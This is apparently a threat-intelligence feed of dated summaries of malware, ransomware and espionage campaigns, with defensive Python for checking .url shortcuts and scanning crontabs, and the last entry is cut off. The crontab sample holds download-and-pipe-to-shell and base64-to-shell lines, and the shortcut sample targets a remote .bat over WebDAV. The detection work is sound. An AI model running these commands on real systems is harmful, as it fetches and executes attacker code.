- Researchers from Zscaler have identified the use of the Snip3 crypter with new TTPs, deploying RAT families including DcRAT and QuasarRAT against victims across multiple industry verticals such as healthcare, energy and utilities, and manufacturing via spear-phishing emails with subject lines related to “tax statements” in order to lure victims into execution.
Source:
https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time
—
- Intel Source:
- Symantec
- Intel Name:
- Hackers_From_Blackfly_Group_Targeting_Materials_Technology
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Symantec researchers have identified the Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.
—
- Intel Source:
- Sonatype
- Intel Name:
- PyPI_Malicious_Packages_Dropping_Windows_Trojan_via_Dropbox
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Researchers from Sonatype have observed hundreds of packages getting published and removed in batches on the PyPI registry. These packages, despite containing contextual terms like “libs,” “nvidiapaypalsuper,” and so on, are named quite arbitrarily.
—
- Intel Source:
- Team Cymru
- Intel Name:
- Chile_IP_Address_Connecting_to_IcedID_BackConnect_C2_Servers
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Researchers from Team Cymru have identified an IP address geolocating to Chile that is used to access various elements of the IcedID infrastructure.
Source:
https://www.team-cymru.com/post/from-chile-with-malware
—
- Intel Source:
- Cyble
- Intel Name:
- ChatGPT_Based_Phishing_Attacks
- Date of Scan:
- 2023-02-28
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have detected several phishing websites that are being promoted through a fraudulent OpenAI social media page to spread various types of malware. Furthermore, several phishing sites are impersonating ChatGPT to steal credit card information.
Source:
https://blog.cyble.com/2023/02/22/the-growing-threat-of-chatgpt-based-phishing-attacks/
—
- Intel Source:
- Cofense
- Intel Name:
- Hackers_Abusing_Atlassian
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign, under the guise of a payment remittance, taking advantage of custom URLs from Atlassian to redirect users to their phish.
Source:
https://cofense.com/blog/threat-actors-abuse-atlassian-bypass-multiple-secure-email-gateways-segs/
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_Emails_Impersonating_Shipping_Companies
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered malicious emails impersonating shipping companies being distributed in Korea. These emails prompt users to open the attached file with the subject ‘Submitting import clearance info’.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- URL_Files_and_WebDAV_Using_For_IcedID_Infection
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed that IcedID distribution patterns occasionally change and identified a distribution pattern using .url files and WebDAV traffic for an IcedID infection.
Source:
https://isc.sans.edu/diary/URL+files+and+WebDAV+used+for+IcedID+Bokbot+infection/29578/
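The .url-plus-WebDAV delivery pattern in the ISC entry above works because an Internet Shortcut is just an INI file whose `URL=` value Windows resolves, and a `file://host@80/...` or `\\host@SSL@443\DavWWWRoot\...` target is fetched by the WebClient (WebDAV mini-redirector) service rather than over HTTP. The script below is an added example, not code from the ISC diary; it parses .url files, extracts the keys that can reach a remote share (`URL`, `IconFile`, `WorkingDirectory`), and flags targets that are remote UNC/WebDAV paths or end in a script or binary extension. The two sample shortcuts are constructed for this example with an RFC 5737 documentation address, and the extension list is this example's assumption.

```python
"""Inspect Windows Internet Shortcut (.url) files for targets that pull
content over UNC/WebDAV instead of HTTP(S)."""
from __future__ import annotations

import configparser
import re

# Extensions that should never be the target of a mailed shortcut
# (list chosen for this example).
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf",
                     ".hta", ".ps1", ".lnk", ".exe", ".dll", ".msi")

# file://host[@port]/path; host@80 or host@SSL@443 is the WebDAV syntax the
# Windows WebClient mini-redirector understands.
FILE_URL_RE = re.compile(r"^file:/{2,}(?P<host>[^/\\]+)(?P<path>[/\\].*)?$", re.I)
# \\host[@port]\share\path
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)(?P<path>\\.*)?$")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_target(value: str) -> dict | None:
    """Return host/path details if the value reaches a remote share, else None."""
    value = value.strip()
    m = FILE_URL_RE.match(value) or UNC_RE.match(value)
    if not m:
        return None  # http(s), mailto or a plain local path: no UNC/WebDAV fetch
    raw_host = m.group("host")
    path = (m.group("path") or "").replace("\\", "/")
    if re.fullmatch(r"[a-z]:", raw_host, re.I):
        return None  # file:///C:/... is a local drive letter, not a host
    host, _, port = raw_host.partition("@")  # "203.0.113.5@80" -> host, "80"
    if host.lower() in LOCAL_HOSTS:
        return None
    return {
        "host": host,
        "port": port or None,
        "path": path,
        # an explicit @port or the DavWWWRoot marker forces the WebDAV client
        "webdav": bool(port) or "davwwwroot" in path.lower(),
        "script_like": path.lower().endswith(SCRIPT_EXTENSIONS),
    }


def analyze_url_file(text: str) -> dict:
    """Verdict plus per-key findings for the text of one .url file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = {}
    if cp.has_section("InternetShortcut"):
        # configparser lower-cases option names, so look them up in lower case
        for key in ("url", "iconfile", "workingdirectory"):
            if cp.has_option("InternetShortcut", key):
                target = parse_target(cp.get("InternetShortcut", key))
                if target:
                    findings[key] = target
    suspicious = any(t["webdav"] or t["script_like"] for t in findings.values())
    return {"remote_targets": findings, "suspicious": suspicious}


# Constructed samples (203.0.113.0/24 is reserved for documentation).
SAMPLE_LURE = r"""[InternetShortcut]
URL=file://203.0.113.5@80/share/invoice_2023.bat
IconFile=C:\Windows\System32\shell32.dll
IconIndex=3
"""
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://isc.sans.edu/
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LURE
    result = analyze_url_file(text)
    for key, t in result["remote_targets"].items():
        print(f"{key}: host={t['host']} port={t['port']} path={t['path']} "
              f"webdav={t['webdav']} script={t['script_like']}")
    print("verdict:", "SUSPICIOUS" if result["suspicious"] else "no remote share targets")
```

`IconFile` is checked as well as `URL` because a remote icon path is fetched as soon as the shortcut is rendered in Explorer, without any click, which is the classic NTLM-leak trick; a benign shortcut from a mail gateway should have neither key pointing off the host.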
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Investigation_of_PlugX_Trojan
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a file called x32dbg.exe is used to sideload a malicious DLL they identified as a variant of PlugX.
—
- Intel Source:
- Cyble
- Intel Name:
- Analysis_of_FortiNAC_Vulnerability_CVE_2022_39952
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- Cyble researchers have analyzed the vulnerability affecting multiple versions of FortiNAC. The affected product is widely used in mid to large-size enterprises involving state and private entities.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyber_attacks_on_the_Ukrainian_state_organizations
- Date of Scan:
- 2023-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers from CERT-UA have investigated the violation of the integrity and availability of the web resources of a number of state organizations.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_is_Back_With_New_Technique
- Date of Scan:
- 2023-02-28
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that Magniber ransomware is distributed as a Windows installer package file (.msi) in Edge and Chrome browsers.
—
- Intel Source:
- Symantec
- Intel Name:
- New_Hacking_Group_Clasiopa_Targeting_Materials_Research
- Date of Scan:
- 2023-02-27
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified an unknown threat actor targeting materials research organizations in Asia with a distinct set of tools.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research
—
- Intel Source:
- Crowdstrike & Jamf
- Intel Name:
- I2Pminer_Variant_Targeting_MacOS
- Date of Scan:
- 2023-02-27
- Impact:
- LOW
- Summary:
- CrowdStrike and Jamf researchers have analyzed a macOS-targeted mineware campaign that used malicious application bundles to deliver the open source XMRig cryptomining software and Invisible Internet Project (I2P) network tooling.
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hackers_Targeting_Multiple_ManageEngine_Products
- Date of Scan:
- 2023-02-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Bitdefender have observed that multiple threat actors have opportunistically weaponized a now-patched critical vulnerability (CVE-2022-47966) affecting several Zoho ManageEngine products since January 20, 2023.
Additional Blog link: https://www.bitdefender.com/blog/labs/weaponizing-pocs-a-targeted-attack-using-cve-2022-47966/
Source:
https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- Lazarus_Group_Using_New_WinorDLL64_Backdoor
- Date of Scan:
- 2023-02-27
- Impact:
- MEDIUM
- Summary:
- WeLiveSecurity researchers have analyzed WinorDLL64, one of the payloads of the Wslink downloader discovered back in 2021; the payload is named after its filename, WinorDLL64.dll. Wslink, which had the filename WinorLoaderDLL64.dll, is a loader for Windows binaries that runs as a server and executes received modules in memory.
Source:
https://www.welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/
—
- Intel Source:
- Checkmarx
- Intel Name:
- NPM_Packages_Distributing_Phishing_Links
- Date of Scan:
- 2023-02-24
- Impact:
- LOW
- Summary:
- Checkmarx researchers have uncovered a recurring attack method in which attackers use spamming techniques to flood the open-source ecosystem with packages whose README.md files contain links to phishing campaigns.
Source:
https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Targeting_Innorix_Agent_Vulnerable_Versions
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered malware being distributed to users running vulnerable versions of Innorix Agent; the collected malware is a backdoor that attempts to connect to a C&C server.
—
- Intel Source:
- Reversing Labs
- Intel Name:
- PyPI_Packages_Mimicking_Popular_Libraries
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Reversing Labs researchers are warning of “imposter packages” mimicking popular libraries on the Python Package Index (PyPI). The 41 malicious PyPI packages pose as typosquatted variants of legitimate modules such as HTTP, AIOHTTP, requests, urllib, and urllib3.
Source:
https://www.reversinglabs.com/blog/beware-impostor-http-libraries-lurk-on-pypi
—
- Intel Source:
- Varonis
- Intel Name:
- The_New_Version_of_HardBit_2_0_Ransomware
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Researchers from Varonis have identified a new version of HardBit ransomware, HardBit 2.0, which is still under development and features unique capabilities.
—
- Intel Source:
- Zscaler
- Intel Name:
- Techniques_Analysis_of_Rhadamanthys_information_stealer
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Zscaler researchers have analyzed Rhadamanthys, an information stealer written in C++ that is distributed mostly via malicious Google advertisements. The malware implements complex anti-analysis techniques using a public open source library and is designed to steal credentials from web browsers, VPN clients, email clients and chat clients, as well as cryptocurrency wallets.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Group_Leveraging_Anti_Forensic_Techniques
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- ASEC researchers have shared the anti-forensic traces and details found in the systems that were infiltrated by the Lazarus group.
—
- Intel Source:
- Sekoia
- Intel Name:
- A_New_InfoStealer_Stealc
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Sekoia researchers have identified a new information stealer during routine dark web monitoring. It is advertised as Stealc by its alleged developer, who goes by the handle Plymouth and presents Stealc as a fully featured, ready-to-use stealer whose development relied on the Vidar, Raccoon, Mars, and Redline stealers.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Credit_Card_Skimmers_Targeting_Ecommerce_Platforms
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have observed credit card skimmers targeting e-commerce platforms such as Magento and WordPress/WooCommerce.
—
- Intel Source:
- Sentinelone
- Intel Name:
- The_Investigation_of_8220_Gang_Cloud_Threat
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- SentinelOne researchers have analyzed the 8220 Gang cloud threat, as the group has again switched to new infrastructure and samples.
—
- Intel Source:
- Sucuri
- Intel Name:
- Attackers_Leveraging_Cron_Jobs_to_Infect_Websites
- Date of Scan:
- 2023-02-23
- Impact:
- LOW
- Summary:
- Sucuri researchers have observed attackers using malicious cron jobs quite frequently to reinfect websites, and have recently seen a distinctive new wave of these infections.
Source:
https://blog.sucuri.net/2023/02/attackers-abuse-cron-jobs-to-reinfect-websites.html
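Reinfection via cron works because the attacker leaves behind a scheduled job that re-downloads or re-writes the backdoor after the site owner has cleaned the web root, so the crontabs of the web user and root have to be part of any cleanup. The Python script below is an added triage aid and not Sucuri's tooling: it parses crontab text and flags jobs by heuristics (a download piped straight into a shell, base64 decoding at run time, code run from world-writable directories, inline PHP, permission loosening) and notes schedules that re-run constantly. The crontab content, including the host 198.51.100.7, is a constructed sample.

```python
import re

# Heuristics for cron entries used to re-plant web malware; these are illustrative
# patterns, not an exhaustive signature set.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b"), "downloads content and pipes it straight into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes a base64 blob at run time"),
    (re.compile(r"\b(eval|exec)\s*\("), "evaluates dynamically built code"),
    (re.compile(r"(?:^|[\s=:\"'])(/tmp|/dev/shm|/var/tmp)/\S+"), "executes or writes a file in a world-writable directory"),
    (re.compile(r"\bphp\s+-r\b"), "runs inline PHP code"),
    (re.compile(r"\bchmod\s+(-R\s+)?[0-7]?[0-7]{2}[2367]\b"), "makes a file world-writable"),
]

# A cron job line is either '@reboot'/'@hourly'-style shorthand or five schedule fields,
# followed by the command. Comments, blank lines and VAR=value lines are not jobs.
CRON_LINE_RE = re.compile(r"^(?P<schedule>@\w+\s+|(?:\S+\s+){5})(?P<command>.+?)\s*$")
ENV_LINE_RE = re.compile(r"^[A-Za-z_]\w*=")
ALWAYS_ON = {"* * * * *", "@reboot"}


def parse_crontab(text):
    """Yield (line_number, schedule, command) for every job line in crontab text."""
    for number, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or ENV_LINE_RE.match(stripped):
            continue
        m = CRON_LINE_RE.match(stripped)
        if m:
            yield number, m.group("schedule").strip(), m.group("command")


def scan_crontab(text):
    """Return [(line_number, command, reasons)] for jobs that match at least one heuristic."""
    hits = []
    for number, schedule, command in parse_crontab(text):
        reasons = [why for pattern, why in SUSPICIOUS_PATTERNS if pattern.search(command)]
        # Reinfection loops tend to run every minute or at boot; only note this when the
        # command itself is already suspicious, since plenty of legitimate jobs run that often.
        if reasons and schedule in ALWAYS_ON:
            reasons.append(f"schedule '{schedule}' re-runs the job constantly")
        if reasons:
            hits.append((number, command, reasons))
    return hits


# Constructed sample crontab; the host 198.51.100.7 is a documentation address, and
# 'aWQ=' is just base64 for 'id'. Nothing here comes from a real incident.
SAMPLE_CRONTAB = """# constructed sample
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://198.51.100.7/x.txt | sh
*/2 * * * * echo aWQ= | base64 -d | sh
@reboot /dev/shm/.x/run.sh
"""

if __name__ == "__main__":
    for number, command, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {number}: {command}")
        for reason in reasons:
            print(f"    - {reason}")
```

Feed it the output of `crontab -l` for every account (the web server user included) and the contents of /etc/cron.d, /etc/crontab and the /etc/cron.* directories; a job that only matches the schedule heuristic is deliberately not reported, to keep legitimate minute-granularity jobs out of the results.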
—
- Intel Source:
- ASEC
- Intel Name:
- HWP_Malware_Using_the_Steganography_Technique
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the RedEyes threat group is distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291).
—
- Intel Source:
- SocInvestigation
- Intel Name:
- Return_of_Redline_Stealer
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- SOC Investigation researchers discussed the Redline Stealer malware in their blog: its background, capabilities, and impact, along with an outline of the basic steps the malware takes.
Source:
https://www.socinvestigation.com/redline-stealer-returns-with-new-ttps-detection-response/
—
- Intel Source:
- Quickheal
- Intel Name:
- Raccoon_Stealer_V2_Using_Microsoft_Add_Ins_to_Delivering_Malware
- Date of Scan:
- 2023-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers from QuickHeal have identified that Microsoft Office add-ins, specifically Excel XLL add-ins, present a potential threat vector for malware such as Raccoon Stealer V2. This malware is designed to steal sensitive information from infected systems, and the campaign uses the add-ins as its means of delivering the malware to target systems.
Source:
https://blogs.quickheal.com/your-office-document-is-at-risk-xll-a-new-attack-vector/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Expansion_of_attackes_on_Linux_ESXi_Servers_by_Royal_ransomware
- Date of Scan:
- 2023-02-22
- Impact:
- MEDIUM
- Summary:
- TrendMicro analysts predicted last year that ransomware groups would increasingly target Linux servers and embedded systems in the coming years, after detecting a double-digit year-on-year (YoY) increase in attacks on these systems. A new Royal ransomware variant targeting Linux systems has now emerged, and TrendMicro shared a technical analysis of this variant in their blog.
—
- Intel Source:
- Symantec
- Intel Name:
- A_new_threat_group_Hydrochasma_targets_organizations_in_Asia
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Researchers from Symantec have observed a new threat group, Hydrochasma, attacking shipping companies and medical laboratories in Asia. Hydrochasma has not been linked to any previously identified group, but appears to have a possible interest in industries that may be involved in COVID-19-related treatments or vaccines. A possible infection vector used by Hydrochasma was a phishing email.
—
- Intel Source:
- SecuronixThreatLabs
- Intel Name:
- STL_Investigation_222
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Indicators of Compromise related to a Securonix Threat Labs investigation
—
- Intel Source:
- Cyble
- Intel Name:
- Qakbot_Distributing_via_OneNote
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Cyble researchers have identified multiple distribution methods for the widely known banking trojan Qakbot; these methods include malspam with OneNote attachments, malspam with zip files containing WSF files, and others.
—
- Intel Source:
- Cyble
- Intel Name:
- The_Examination_of_DarkCloud_Stealer
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- Cyble researchers have observed an increase in the prevalence of DarkCloud Stealer, with Threat Actors employing various spam campaigns to disseminate this malware worldwide.
Source:
https://blog.cyble.com/2023/02/20/decoding-the-inner-workings-of-darkcloud-stealer/
—
- Intel Source:
- Securityscorecard
- Intel Name:
- VMWare_ESXi_Vulnerability_targeted_by_ESXiArgs_Ransomware
- Date of Scan:
- 2023-02-22
- Impact:
- MEDIUM
- Summary:
- After warnings of a widespread ransomware campaign exploiting CVE-2021-21974, a VMware ESXi vulnerability, the SecurityScorecard Threat Research Team began analyzing the new campaign in response to the advisories and discovered possible communication between target IP addresses and infrastructure involved in exploiting this vulnerability.
—
- Intel Source:
- Esentire
- Intel Name:
- Analysis_of_Icarus_Stealer
- Date of Scan:
- 2023-02-22
- Impact:
- LOW
- Summary:
- eSentire researchers have analyzed the Icarus stealer malware, covering the technical details of how the malware operates and security recommendations to protect organizations from it.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-icarus-stealer
—
- Intel Source:
- ThreatMon
- Intel Name:
- ReverseRAT_Backdoor_Targeting_Indian_Government_Agencies
- Date of Scan:
- 2023-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers from ThreatMon have observed a spear-phishing campaign targeting Indian government entities that aim to deploy an updated version of a backdoor called ReverseRAT.
Source:
https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Royal_Ransomware_Targeting_Linux_ESXi_Servers
- Date of Scan:
- 2023-02-21
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have observed that Royal ransomware is expanding its targets by developing Linux-based versions.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Deep_Examination_of_CatB_Ransomware
- Date of Scan:
- 2023-02-21
- Impact:
- LOW
- Summary:
- Fortinet researchers have analyzed the CatB ransomware. It is a reasonably new entrant to the ransomware field, with samples only dating back to December 2022.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-catb-ransomware
—
- Intel Source:
- Sucuri
- Intel Name:
- The_Dangers_of_Installing_Nulled_WordPress_Themes_and_Plugins
- Date of Scan:
- 2023-02-20
- Impact:
- LOW
- Summary:
- Researchers from Sucuri warn that installing nulled themes or plugins on a website is not only participation in software theft but can also introduce serious risks, including malware, SEO spam, and website backdoors.
Source:
https://blog.sucuri.net/2023/02/the-dangers-of-installing-nulled-wordpress-themes-and-plugins.html
—
- Intel Source:
- Malwarebytes
- Intel Name:
- WordPress_Sites_Backdoored_With_Ad_Fraud_Plugin
- Date of Scan:
- 2023-02-20
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified around 50 WordPress blogs that have been backdoored with a plugin called fuser-master.
—
- Intel Source:
- SecurityScoreCard
- Intel Name:
- BlackCat_Ransomware_Group_Targeting_Healthcare_Service_Provider
- Date of Scan:
- 2023-02-20
- Impact:
- LOW
- Summary:
- Security ScoreCard researchers have observed BlackCat ransomware group adding an entry for an electronic health record (EHR) vendor to its extortion site.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Hackers_Targeting_Security_Service_of_Ukraine_and_NATO_Allies
- Date of Scan:
- 2023-02-20
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have observed multiple weaponized phishing emails probably targeting the Security Service of Ukraine (SSU), NATO allies like Latvia, and private companies such as Culver Aviation.
—
- Intel Source:
- SentinelOne
- Intel Name:
- A_new_threat_cluster_WIP26
- Date of Scan:
- 2023-02-19
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has observed threat activity tracked as WIP26, which has been targeting telecommunication companies in the Middle East. WIP26 is characterized by its abuse of public cloud infrastructure (Microsoft 365 Mail, Microsoft Azure, Google Firebase, and Dropbox) for malware delivery, data exfiltration, and C2 purposes.
—
- Intel Source:
- ASEC
- Intel Name:
- Analysis_of_distribution_sites_of_Magniber_ransomware_using_EDR
- Date of Scan:
- 2023-02-18
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that Magniber ransomware distribution continues, and are tracking the distribution site URLs through a different method, using EDR.
—
- Intel Source:
- Yoroi
- Intel Name:
- From_Targeting_Attacks_to_widespread_Usage_of_Brute_Ratel
- Date of Scan:
- 2023-02-18
- Impact:
- LOW
- Summary:
- Researchers from Yoroi have tracked the shift of Brute Ratel from targeted attacks to widespread usage, actively searching for and analyzing potential security breaches or anomalies in organizations' systems and networks.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Kitsune_Delivering_New_WhiskerSpy_Backdoor
- Date of Scan:
- 2023-02-18
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a new backdoor which they have attributed to the APT group known as Earth Kitsune. Since 2019, Earth Kitsune has been distributing variants of self-developed backdoors to targets, primarily individuals who are interested in North Korea.
Source:
https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html
—
- Intel Source:
- Blackberry
- Intel Name:
- DarkBit_Ransomware_Targeting_Israel
- Date of Scan:
- 2023-02-18
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers have identified a new ransomware strain dubbed “DarkBit” that has recently appeared on the threat landscape after targeting one of Israel’s top research universities, Technion – Israel Institute of Technology (IIT).
Source:
https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_From_RedEyes_Using_New_Malware_to_Steal_Data
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the APT37 (RedEyes) threat group is using a new evasive ‘M2RAT’ malware and steganography to target individuals for intelligence collection.
—
- Intel Source:
- Symantec
- Intel Name:
- New_Malware_Abusing_Microsoft_IIS_Feature_to_Establish_Backdoor
- Date of Scan:
- 2023-02-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have observed a new malware that abuses a feature of Microsoft’s Internet Information Services (IIS) to deploy a backdoor onto targeted systems.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis
—
- Intel Source:
- Lookout
- Intel Name:
- Dark_Caracal_APT_Back_with_New_Version_of_Bandook_Spyware
- Date of Scan:
- 2023-02-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Lookout have discovered that the Dark Caracal APT is currently using a new version of Bandook spyware to target Windows systems.
Source:
https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Yako_Group_is_Back
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have investigated several incidents and observed the intrusion set introduced new tools and malware within a short period of time, frequently changing and expanding its attack targets. Security researchers believe that Earth Yako is still active and will keep targeting more organizations soon.
—
- Intel Source:
- Trellix
- Intel Name:
- ESXiArgs_Ransomware_Leveraging_Two_Year_Old_Vulnerability
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- Trellix researchers have identified that the global ESXiArgs ransomware campaign is riding on a two-year-old vulnerability. The vulnerability targeted by the ransomware actors is CVE-2021-21974, which allows an attacker to exploit the OpenSLP service if the affected server is exposed to the internet.
—
- Intel Source:
- Morphisec
- Intel Name:
- Malware_Campaign_Delivering_ProxyShellMiner_to_Windows_Endpoints
- Date of Scan:
- 2023-02-17
- Impact:
- MEDIUM
- Summary:
- Morphisec researchers have identified a highly evasive malware campaign delivering ProxyShellMiner to Windows endpoints. ProxyShellMiner exploits the ProxyShell vulnerabilities CVE-2021-34473 and CVE-2021-34523 in Microsoft Exchange servers for initial access to and compromise of an organization in order to deliver crypto miners.
—
- Intel Source:
- Sentinelone
- Intel Name:
- The_Analysis_of_TZW_Ransomware
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- SentinelOne researchers have analyzed the TZW ransomware in depth and observed that TZW is linked to a known malware family called GlobeImposter (sometimes referred to as LOLNEK or LOLKEK).
—
- Intel Source:
- PaloAlto
- Intel Name:
- Mirai_Variant_V3G4_Targeting_IoT_Devices
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have observed a Mirai variant called V3G4 leveraging several vulnerabilities to spread itself. Once vulnerable devices are compromised, they are fully controlled by the attackers and become part of the botnet.
Source:
https://unit42.paloaltonetworks.com/mirai-variant-v3g4/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Trojanized_Installers_Targeting_Southeast_and_East_Asia
- Date of Scan:
- 2023-02-17
- Impact:
- LOW
- Summary:
- ESET researchers have identified a campaign using trojanized installers to deliver the FatalRAT malware, distributing via malicious websites linked in ads that appear in Google search results.
Source:
https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/
—
- Intel Source:
- Cyble
- Intel Name:
- Diving_Deep_into_DarkBit_Ransomware
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- Cyble researchers have recently detected a sample of the DarkBit ransomware and analyzed its details.
Source:
https://blog.cyble.com/2023/02/15/uncovering-the-dark-side-of-darkbit-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Targeting_Security_Related_Workers
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that this malware is being distributed to broadcasting and ordinary companies as well as to those in the security-related field.
—
- Intel Source:
- SecurityScoreCard
- Intel Name:
- US_Public_Housing_Authority_ransomware_attack
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- A U.S. Public Housing Authority has announced a disruption but has not elaborated on the nature of the event. The LockBit ransomware group, which has made false claims in the past, took responsibility for the incident.
—
- Intel Source:
- ZScaler
- Intel Name:
- A_new_Havoc_campaign_targeting_a_Government_organization
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- The Zscaler ThreatLabz research team observed a new campaign targeting a government organization in which the threat actors used a new Command & Control (C2) framework named Havoc. The team provided a technical analysis and overview of the recently discovered attack campaign and showed how Havoc can be leveraged by threat actors in various campaigns.
Source:
https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_2_0_Ransomware_is_Back
- Date of Scan:
- 2023-02-16
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have identified that Lockbit 2.0 is being distributed in a MalPE format instead of the NSIS format.
—
- Intel Source:
- DOCGuard
- Intel Name:
- Microsoft_OneNote_Sample_Targeting_Cisco_VPN
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- Researchers from DOCGuard have identified a Microsoft OneNote sample targeting Cisco VPN users that bypasses all antivirus engines.
Source:
https://twitter.com/doc_guard/status/1625872935595507713
—
- Intel Source:
- ASEC
- Intel Name:
- Paradise_Ransomware_Distributing_Through_AweSun_Vulnerability_Exploitation
- Date of Scan:
- 2023-02-16
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the distribution of Paradise ransomware; the threat actors are suspected of exploiting a vulnerability in the Chinese remote control program AweSun.
—
- Intel Source:
- Minerva Labs
- Intel Name:
- New_Malware_That_Can_Fly_Under_the_Radar
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
